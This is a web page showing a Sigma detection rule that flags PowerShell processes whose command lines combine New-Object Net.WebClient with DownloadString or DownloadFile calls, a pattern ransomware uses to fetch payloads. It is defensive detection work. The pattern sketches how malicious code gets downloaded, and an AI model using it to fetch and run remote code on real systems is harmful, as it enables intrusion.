PowerShell Download Pattern

calendar Oct 20, 2025 · attack.execution attack.t1059.001  ·
Share on: linkedin copy

Detects a Powershell process that contains download commands in its command line string

Sigma rule (View on GitHub)

 1title: PowerShell Download Pattern
 2id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7
 3related:
 4    - id: e6c54d94-498c-4562-a37c-b469d8e9a275
 5      type: derived
 6    - id: 8f70ac5f-1f6f-4f8e-b454-db19561216c5
 7      type: obsolete
 8status: test
 9description: Detects a Powershell process that contains download commands in its command line string
10references:
11    - https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html
12    - https://lab52.io/blog/winter-vivern-all-summer/
13    - https://hatching.io/blog/powershell-analysis/
14author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
15date: 2019-01-16
16modified: 2025-10-20
17tags:
18    - attack.execution
19    - attack.t1059.001
20logsource:
21    category: process_creation
22    product: windows
23detection:
24    selection_img:
25        - Image|endswith:
26              - '\powershell_ise.exe'
27              - '\powershell.exe'
28              - '\pwsh.exe'
29        - OriginalFileName:
30              - 'PowerShell_ISE.EXE'
31              - 'PowerShell.EXE'
32              - 'pwsh.dll'
33    selection_cli:
34        CommandLine|contains|all:
35            - 'new-object'
36            - 'net.webclient).'
37            - 'download'
38        CommandLine|contains:
39            - 'string('
40            - 'file('
41    condition: all of selection_*
42falsepositives:
43    - Unknown
44level: medium

References

Related rules

to-top